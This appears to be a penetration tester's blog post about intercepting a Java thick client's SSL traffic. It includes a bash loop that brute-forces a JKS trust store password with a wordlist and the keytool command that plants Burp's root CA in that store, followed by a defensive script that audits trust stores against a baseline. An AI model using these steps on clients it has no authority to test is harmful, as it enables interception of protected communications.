Recently, during a pentest, I stumbled upon a Java thick client that came with a configuration file (*.properties) referring to a Java trust store:
# The following property specifies where the TrustStore file
# containing the trusted CA certificates or trusted certificates
# can be found.
javax.net.ssl.trustStore=cert/clientTrustStore.jks
An SSL trust store is basically a container holding the certificates (CA certificates or individual server certificates) that the client trusts.
This client was making an SSL connection to a web service endpoint. To be able to put myself in the middle of the protocol, I had to add Burp's CA certificate to this trust store.
1. Brute force the truststore password.
Here, a good old bash loop calling keytool with a dictionary file did the trick:
$ for pwd in $(cat ~/pentest/dictionary/most_used_pwd.txt); do (keytool -list -keystore cert/clientTrustStore.jks -storepass "$pwd" 2>/dev/null) && echo FOUND PASSWORD "$pwd"; done
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
keytool error: java.io.IOException: Keystore was tampered with, or password was incorrect
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 5 entries
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 8D:B8:(hidden):41:1B
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): 15:37:(hidden):25:E9
(hidden), 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:(hidden):59:BE
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 32:DE:(hidden):BB:4D
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): CB:17:(hidden):FA:1C
FOUND PASSWORD password
2. Add Burp's CA certificate to the trust store
Well, OK, here the password was "password", so I could list the contents of the client trust store. Now, adding Burp's root CA is easy: create a listener within Burp, use it as a proxy, browse to any HTTPS website, display the certificate chain and save the root CA certificate to a file.
Then, to add this root CA to your trust store:
keytool -import -alias portswiggerca -keystore cert/clientTrustStore.jks -file PortSwiggerCA.cer -storepass password
3. Start playing
To confirm that the certificate has been added correctly, list the trust store's contents with the same keytool "-list" command used in the brute force above:
$ keytool -list -keystore cert/clientTrustStore.jks -storepass password
Keystore type: JKS
Keystore provider: SUN
Your keystore contains 6 entries
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 8D:B8:(hidden):41:1B
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): 15:37:(hidden):25:E9
(hidden), 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:(hidden):59:BE
(hidden), 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 32:DE:(hidden):BB:4D
(hidden), 25/02/2014, trustedCertEntry,
Certificate fingerprint (MD5): CB:17:(hidden):FA:1C
portswiggerca, 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:D7:52:FB:7A:28:61:71:0F:FF:09:9A:47:59:BE
Now you can proxy your client app through Burp and start playing with the protocol!
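The flip side of the listing above: an added alias such as "portswiggerca" stays visible in the keytool output, so a deployed client's trust store can be audited by diffing that listing against a baseline of approved entries. The script below is an added example, not code from the original post; the sample listing, the "corpca" alias and all fingerprints in it are constructed.

```shell
#!/bin/sh
# Audit a JKS trust store against a baseline of approved entries, so that
# an alias nobody approved (e.g. a proxy's root CA) gets flagged.
# Added example, not from the original post; sample values are constructed.

# Turn `keytool -list` output (stdin) into "alias fingerprint" lines.
# Handles the two-line entry format shown in the post; it keys on the
# "Certificate fingerprint" prefix, so MD5 (old JDKs) and SHA-256
# (current JDKs) listings both parse.
parse_keytool_list() {
    awk -F', ' '
        /trustedCertEntry|PrivateKeyEntry/ { alias = $1; next }
        /Certificate fingerprint/ { sub(/.*: /, ""); print alias, $0 }'
}

# audit_truststore LISTING BASELINE
# LISTING: text of `keytool -list`; BASELINE: "alias fingerprint" lines.
# Prints one "UNEXPECTED: alias fingerprint" line per entry missing from
# the baseline; no output means the store matches.
audit_truststore() {
    printf '%s\n' "$1" | parse_keytool_list | while read -r alias fp; do
        printf '%s\n' "$2" | grep -qxF "$alias $fp" ||
            echo "UNEXPECTED: $alias $fp"
    done
}

# Constructed sample listing (same layout as the post's keytool output).
SAMPLE_LISTING='Keystore type: JKS
Keystore provider: SUN
Your keystore contains 2 entries

corpca, 06/06/2013, trustedCertEntry,
Certificate fingerprint (MD5): 8D:B8:00:11:22:33:44:55:66:77:88:99:AA:BB:41:1B
portswiggerca, 02/04/2014, trustedCertEntry,
Certificate fingerprint (MD5): E4:61:00:11:22:33:44:55:66:77:88:99:AA:BB:59:BE'

# Constructed baseline: only the corporate CA is approved.
BASELINE='corpca 8D:B8:00:11:22:33:44:55:66:77:88:99:AA:BB:41:1B'

# Real run: audit_truststore.sh <store.jks> <storepass> <baseline.txt>
if [ "$#" -eq 3 ]; then
    listing=$(keytool -list -keystore "$1" -storepass "$2") || exit 2
    result=$(audit_truststore "$listing" "$(cat "$3")")
    [ -z "$result" ] && echo "trust store matches baseline" && exit 0
    printf '%s\n' "$result"; exit 1
fi
```

Run against the constructed sample, the audit reports only the portswiggerca entry; the baseline file for a real client should be generated from a known-good build of the store and kept outside the deployed application directory.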